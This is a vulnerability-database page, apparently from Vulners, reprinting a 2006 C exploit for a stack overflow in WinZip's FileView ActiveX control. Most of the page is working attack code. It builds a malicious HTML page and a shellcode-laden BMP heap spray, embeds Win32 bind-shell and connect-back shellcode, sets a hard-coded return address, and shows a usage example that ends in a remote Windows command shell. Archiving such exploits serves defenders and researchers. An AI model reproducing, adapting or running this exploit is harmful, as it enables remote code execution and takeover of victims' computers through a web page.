Vulners
Lucene search
WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow
/* WinZip <= 10.0.7245 FileView ActiveX buffer overflow exploit
* ============================================================
* A vulnerability has been identified within Winzip that allows remote
* attackers to execute arbitrary code. User interaction is required to
* exploit this vulnerability in that the target must visit a malicious
* web page. The flaw exists within "FileView" ActiveX control which
* contains stack based overflow conditions. This exploit generates a
* malicious html page and contains shellcode embedded within an image
* file. Due to the random nature of the heap, this exploit uses hard
* coded location of the image bytes within the heap and as such is
* unreliable in exploitation of this bug, but has approximately 1 in
* 6 hit ratio within the tested environment.
*
* Example.
* $ ./prdelka-vs-MS-winzip -f index.html -i foo.bmp -s 0 -t 0
* [ WinZip <= 10.0.7245 FileView ActiveX overflow exploit
* [ Using shellcode 'Win32 x86 bind() shellcode (4444/tcp default)' (400 bytes)
* [ Using target 'WinXP SP2(en) WinZIP 10.0.6667'
* [ Creating image containing shellcode 'foo.bmp'
* [ Creating html exploit page 'index.html'
* $
* ... clicky clicky MSIE ...
* $ telnet 192.168.1.223 4444
* Connected to 192.168.1.223.
* Escape character is '^]'.
*
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\Documents and Settings\User\Desktop>
*
* - prdelka
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <getopt.h>
#define NOPSIZE 999999
struct target {
char* name;
int retaddr;
};
struct shellcode {
char* name;
short port;
int host;
char* shellcode;
};
int targetno = 1;
struct target targets[] = {
{"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}
/* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */
};
int shellno = 2;
struct shellcode shellcodes[] = {
{"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,
"\x48\x40\xf5\x49\xd6\x4a\xf9\x91\x47\x96\x2f\xf8\x9b\x37\x41\xf5"
"\x99\x47\xf9\xf9\xfc\xf9\x48\x4e\x4b\x9b\x90\x9b\xf5\x97\x40\xf9"
"\xd6\x41\xf9\x48\x9b\x92\xfd\x9b\x49\x42\x4f\x9f\x90\xd6\x27\x9b"
"\x93\x46\x2f\x90\xfd\x4a\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b"
"\x81\x73\x13\xbc\xe8\x2b\x27\x83\xeb\xfc\xe2\xf4\x3d\x2c\x7f\xd5"
"\x43\x17\xd7\x4d\x57\xa5\xc3\xde\x43\x17\xd4\x47\x37\x84\x0f\x03"
"\x37\xad\x17\xac\xc0\xed\x53\x26\x53\x63\x64\x3f\x37\xb7\x0b\x26"
"\x57\xa1\xa0\x13\x37\xe9\xc5\x16\x7c\x71\x87\xa3\x7c\x9c\x2c\xe6"
"\x76\xe5\x2a\xe5\x57\x1c\x10\x73\x98\xc0\x5e\xc2\x37\xb7\x0f\x26"
"\x57\x8e\xa0\x2b\xf7\x63\x74\x3b\xbd\x03\x28\x0b\x37\x61\x47\x03"
"\xa0\x89\xe8\x16\x67\x8c\xa0\x64\x8c\x63\x6b\x2b\x37\x98\x37\x8a"
"\x37\xa8\x23\x79\xd4\x66\x65\x29\x50\xb8\xd4\xf1\xda\xbb\x4d\x4f"
"\x8f\xda\x43\x50\xcf\xda\x74\x73\x43\x38\x43\xec\x51\x14\x10\x77"
"\x43\x3e\x74\xae\x59\x8e\xaa\xca\xb4\xea\x7e\x4d\xbe\x17\xfb\x4f"
"\x65\xe1\xde\x8a\xeb\x17\xfd\x74\xef\xbb\x78\x74\xff\xbb\x68\x74"
"\x43\x38\x4d\x4f\xad\xb4\x4d\x74\x35\x09\xbe\x4f\x18\xf2\x5b\xe0"
"\xeb\x17\xfd\x4d\xac\xb9\x7e\xd8\x6c\x80\x8f\x8a\x92\x01\x7c\xd8"
"\x6a\xbb\x7e\xd8\x6c\x80\xce\x6e\x3a\xa1\x7c\xd8\x6a\xb8\x7f\x73"
"\xe9\x17\xfb\xb4\xd4\x0f\x52\xe1\xc5\xbf\xd4\xf1\xe9\x17\xfb\x41"
"\xd6\x8c\x4d\x4f\xdf\x85\xa2\xc2\xd6\xb8\x72\x0e\x70\x61\xcc\x4d"
"\xf8\x61\xc9\x16\x7c\x1b\x81\xd9\xfe\xc5\xd5\x65\x90\x7b\xa6\x5d"
"\x84\x43\x80\x8c\xd4\x9a\xd5\x94\xaa\x17\x5e\x63\x43\x3e\x70\x70"
"\xee\xb9\x7a\x76\xd6\xe9\x7a\x76\xe9\xb9\xd4\xf7\xd4\x45\xf2\x22"
"\x72\xbb\xd4\xf1\xd6\x17\xd4\x10\x43\x38\xa0\x70\x40\x6b\xef\x43"
"\x43\x3e\x79\xd8\x6c\x80\x55\xff\x5e\x9b\x78\xd8\x6a\x17\xfb\x27"},
{"Win32 x86 connect() shellcode (4444/tcp default)",167,160,
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
"\x01\x02\x03\x04\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xec\xf9"
"\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
"\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
"\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"}
};
char html1[]="<HTML>\r\n<HEAD>\r\n<TITLE></TITLE>\r\n</HEAD>\r\n"
"<BODY>\r\n<SCRIPT LANGUAGE=\"VBScript\">\r\nSub WZ"
"FILEVIEW_OnAfterItemAdd(Item)\r\nWZFILEVIEW.FilePa"
"ttern = \""; /* smash the stack here */
char html2[]="\"\r\nend sub\r\n</SCRIPT>\r\n<IMG SRC=\"";
char html3[]="\">\r\n<OBJECT ID=\"WZFILEV"
"IEW\" WIDTH=200 HEIGHT=200\r\nCLASSID=\"CLSID:A09A"
"E68F-B14D-43ED-B713-BA413F034904\">\r\n</OBJECT>\r"
"\n</BODY>\r\n</HTML>\r\n";
char bmphdr[]="\x42\x4d\x3e\xbb\x2d\x00\x00\x00\x00\x00\x36\x00\x00"
"\x00\x28\x00\x00\x00\xe7\x03\x00\x00\xe7\x03\x00\x00"
"\x01\x00\x18\x00\x00\x00\x00\x00\x08\xbb\x2d\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00";
int ret;
void help(char* progname){
int count;
printf("[ Usage instructions.\n[\n");
printf("[ %s <required> (optional)\n[\n[ --filename|-f <file.html>\n",progname);
printf("[ --imgname|-i <image.bmp>\n[ --shellcode|-s <shell#>\n");
printf("[ --shellport|-p (port)\n");
printf("[ --shellhost|-i (ip)\n");
printf("[ --target|-t <target#/0xretaddr>\n[\n");
printf("[ Target#'s\n");
for(count = 0;count <= targetno - 1;count++){
printf("[ %d %s 0x%x\n",count,targets[count],targets[count]);
}
printf("[\n[ Shellcode#'s\n");
for(count = 0;count <= shellno - 1;count++){
printf("[ %d \"%s\" (length %d bytes)\n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode));
}
exit(0);
}
void setret(char* retarg){
int value = atoi(retarg);
switch(value){
case 0:
printf("[ Using target '%s'\n",targets[ret].name);
ret = targets[ret].retaddr;
break;
default:
ret = strtoul(retarg,NULL,16);
printf("[ Using return address '0x%x'\n",ret);
break;
}
}
int main(int argc, char* argv[]){
unsigned long i, fd;
int c, index, payg, paya, lhost;
short shellport, shellport2;
int ishell = 0, itarg = 0;
char *buffer, *file, *img, *payload;
static struct option options[] = {
{"filename", 1, 0, 'f'},
{"imgname", 1, 0, 'i'},
{"target", 1, 0, 't'},
{"shellcode", 1, 0, 's'},
{"shellport", 1, 0, 'p'},
{"shellhost", 1, 0, 'd'},
{"help", 0, 0,'h'}
};
printf("[ WinZip <= 10.0.7245 FileView ActiveX overflow exploit\n");
while(c != -1){
c = getopt_long(argc,argv,"f:i:t:s:p:d:h",options,&index);
switch(c){
case 'f':
file = optarg;
break;
case 'i':
img = optarg;
break;
case 't':
itarg = 1;
setret(optarg);
if(strlen((char*)&ret) < 4){
fprintf(stderr,"[ Selected target contains a null address!\n");
exit(-1);
}
break;
case 's':
if(ishell==0){
payg = atoi(optarg);
switch(payg){
case 0:
printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
payload = malloc(strlen(shellcodes[payg].shellcode)+1);
memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
shellport2 = 4444;
ishell = 1;
break;
case 1:
printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
payload = malloc(strlen(shellcodes[payg].shellcode)+1);
memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
shellport2 = 4444;
ishell = 1;
break;
default:
printf("[ Invalid shellcode selection %d\n",payg);
exit(0);
break;
}
}
break;
case 'p':
if(ishell==1){
if(shellcodes[payg].port > -1){
paya = strlen(payload);
shellport = atoi(optarg);
shellport2 = shellport;
shellport =(shellport&0xff)<<8 | shellport>>8;
memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport));
if(paya > strlen(payload)) {
printf("[ Error shellcode port introduces null bytes\n");
exit(1);
}
printf("[ Shellcode port changed to '%u'\n",atoi(optarg));
}
else{
printf("[ (%s) port selection is ignored for current shellcode\n",optarg);
}
}
else{
printf("[ No shellcode selected yet, ignoring (%s) port selection\n",optarg);
}
break;
case 'd':
if(ishell==1){
if(shellcodes[payg].host > -1){
paya = strlen(payload);
lhost = inet_addr(optarg);
memcpy((void*)&payload[shellcodes[payg].host],&lhost,sizeof(lhost));
if(paya > strlen(payload)){
printf("[ Error shellhost introduces null bytes\n");
exit(1);
}
printf("[ Shellhost has been changed to '%s'\n",optarg);
}
else{
printf("[ (%s) shellhost selection is ignored for current shellcode\n",optarg);
}
}
else {
printf("[ No shellcode selected yet, ignoring (%s) shellhost selection\n",optarg);
}
break;
case 'h':
help(argv[0]);
break;
default:
break;
}
}
if(ishell==0||itarg==0||strlen(file)==0||strlen(img)==0){
printf("[ Error insufficient arguements, try running '%s --help'\n",argv[0]);
exit(0);
}
// create image
printf("[ Creating image containing shellcode '%s'\n",img);
fd = open(img,O_RDWR|O_CREAT,S_IRWXU);
if(fd == -1){
fprintf(stderr,"[ Error creating %s\n",file);
exit(-1);
}
write(fd,bmphdr,sizeof(bmphdr));
for(i = 0;i < NOPSIZE;i++){
write(fd,"\x90",1);
}
write(fd,payload,strlen(payload));
close(fd);
// create html
printf("[ Creating html exploit page '%s'\n",file);
fd = open(file,O_RDWR|O_CREAT,S_IRWXU);
if(fd == -1){
fprintf(stderr,"[ Error creating %s\n",file);
exit(-1);
}
write(fd,html1,strlen(html1));
for(i = 0;i < 265;i++){
write(fd,"A",1);
}
write(fd,&ret,4);
for(i = 0;i < 1827;i++){
write(fd,"A",1);
}
write(fd,html2,strlen(html2));
write(fd,img,strlen(img));
write(fd,html3,strlen(html3));
close(fd);
}
// milw0rm.com [2006-11-15]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Nov 2006 00:00Current
7.4High risk
Vulners AI Score7.4